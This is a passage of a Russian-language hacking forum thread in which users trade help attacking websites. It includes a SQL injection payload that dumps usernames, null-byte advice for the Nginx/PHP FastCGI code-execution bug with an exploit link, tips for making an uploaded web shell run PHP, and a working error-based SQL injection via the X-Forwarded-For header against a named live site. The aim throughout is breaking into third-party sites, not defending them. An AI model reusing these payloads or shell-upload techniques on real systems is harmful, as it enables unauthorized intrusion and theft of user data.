HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #781  
Старый 31.12.2018, 01:56
karkajoi
Guest
Сообщений: n/a
Провел на форуме:
96779

Репутация: 5
По умолчанию

union select 1,2,3,(select@%20from(select@:=0x00,(select 1 from(select*from user ORDER BY userid ASC limit 0,5)w where(@:=concat(@,0x3c62723e,username))))q) как тут задать бд к которой обращаться ?
 
Ответить с цитированием

  #782  
Старый 03.01.2019, 17:27
romanshkabo
Guest
Сообщений: n/a
Провел на форуме:
521

Репутация: 0
По умолчанию

Нужна помощь с реализацией уязвимости. Acunetix Web Scanner находит уязвимость:

Nginx PHP code execution via FastCGI

Vulnerability description

A critical security issue was reported on servers that run Nginx and PHP via FastCGI. This issue may allow attackers to execute their own PHP code on the system.The problem is not caused by nginx itself, it's related with the PHP option cgi.fix_pathinfo. When this option is enabled, PHP will rewrite SCRIPT_FILENAME and PATH_INFO parameters. When combined with Nginx, this turns into a security issue.

This vulnerability affects Web Server.

Discovered by: Scripting (Nginx_PHP_FastCGI_Code_Execution_File_Upload.scri pt).

Насколько понял, данная уязвимость позволяет выполнить произвольный PHP. Пошарился по гуглу, ничего интересного не нашел. Подскажите что почитать или в какую сторону копать.
 
Ответить с цитированием

  #783  
Старый 05.01.2019, 03:41
neur0funk
Guest
Сообщений: n/a
Провел на форуме:
5363

Репутация: 12
По умолчанию

Цитата:
Сообщение от romanshkabo  
romanshkabo said:

Нужна помощь с реализацией уязвимости. Acunetix Web Scanner находит уязвимость:
Nginx PHP code execution via FastCGI
Vulnerability description
A critical security issue was reported on servers that run Nginx and PHP via FastCGI. This issue may allow attackers to execute their own PHP code on the system.The problem is not caused by nginx itself, it's related with the PHP option cgi.fix_pathinfo. When this option is enabled, PHP will rewrite SCRIPT_FILENAME and PATH_INFO parameters. When combined with Nginx, this turns into a security issue.
This vulnerability affects
Web Server
.
Discovered by: Scripting (Nginx_PHP_FastCGI_Code_Execution_File_Upload.scri pt).
Насколько понял, данная уязвимость позволяет выполнить произвольный PHP. Пошарился по гуглу, ничего интересного не нашел. Подскажите что почитать или в какую сторону копать.
очень древний баян, года так 10, добавь %00.php или /x00.php
 
Ответить с цитированием

  #784  
Старый 05.01.2019, 12:50
etime
Guest
Сообщений: n/a
Провел на форуме:
1385

Репутация: 0
По умолчанию

Можете подсказать? Залил шелл, но он не исполняет php код. Выводит только html. Выглядит это вот так. Вопрос, как заставить работать php?
 
Ответить с цитированием

  #785  
Старый 05.01.2019, 13:01
Тот_самый_Щуп
Guest
Сообщений: n/a
Провел на форуме:
47768

Репутация: 119
По умолчанию

Цитата:
Сообщение от etime  
etime said:

Можете подсказать? Залил шелл, но он не исполняет php код. Выводит только html. Выглядит это вот так. Вопрос, как заставить работать php?
Мрачно выглядит...

Попробуй сначала залить шелла с расширением .txt и посмотри корректность кода. Если всё корректно, то придется воевать с .htaccess в директории, или искать другие директории под запись.
 
Ответить с цитированием

  #786  
Старый 05.01.2019, 13:26
etime
Guest
Сообщений: n/a
Провел на форуме:
1385

Репутация: 0
По умолчанию

Цитата:
Сообщение от Gorbachev  
Gorbachev said:

Мрачно выглядит...
Попробуй сначала залить шелла с расширением .txt и посмотри корректность кода. Если всё корректно, то придется воевать с .htaccess в директории, или искать другие директории под запись.
Спасибо, попробую.
 
Ответить с цитированием

  #787  
Старый 09.01.2019, 15:48
romanshkabo
Guest
Сообщений: n/a
Провел на форуме:
521

Репутация: 0
По умолчанию

Цитата:
Сообщение от neur0funk  
neur0funk said:

очень древний баян, года так 10, добавь %00.php или /x00.php
Можно чуть подробней. Где почитать можно? При обращении к site.ru/ind%ex.php получаю 400 ошибку. В остальных случаях 404
 
Ответить с цитированием

  #788  
Старый 09.01.2019, 16:41
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию

Цитата:
Сообщение от romanshkabo  
romanshkabo said:

Можно чуть подробней. Где почитать можно? При обращении к site.ru/ind%ex.php получаю 400 ошибку. В остальных случаях 404
Изучай:

Null byte PHP bug - https://bugs.php.net/bug.php?id=69418

Nginx FastCGI with nullbyte bug - https://nealpoole.com/blog/2011/08/...ith-null-bytes-php-and-old-versions-of-nginx/

Exploit - https://www.exploit-db.com/exploits/24967
 
Ответить с цитированием

  #789  
Старый 15.01.2019, 15:54
WallHack
Guest
Сообщений: n/a
Провел на форуме:
61136

Репутация: 32
По умолчанию

Не получается сделать вывод error based, может что-то фильтруется ?

Сайт: http://drop-bux.ru

Уязвимость в заголовках headers

X-Forwarded-For: 1'"
 
Ответить с цитированием

  #790  
Старый 15.01.2019, 16:37
Тот_самый_Щуп
Guest
Сообщений: n/a
Провел на форуме:
47768

Репутация: 119
По умолчанию

Цитата:
Сообщение от WallHack  
WallHack said:

Не получается сделать вывод error based, может что-то фильтруется ?
Сайт:
http://drop-bux.ru
Уязвимость в заголовках headers
X-Forwarded-For:
1'"
Все стандартно крутится: X-Forwarded-For: 123"\'and(extractvalue(1,concat(0x3b,(select(versi on())))))#
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Задай Вопрос - Получи Ответ] ZAMUT Сценарии/CMF/СMS 316 08.06.2010 09:56
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Простой вопрос про сниффер errou PHP 15 30.01.2006 20:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ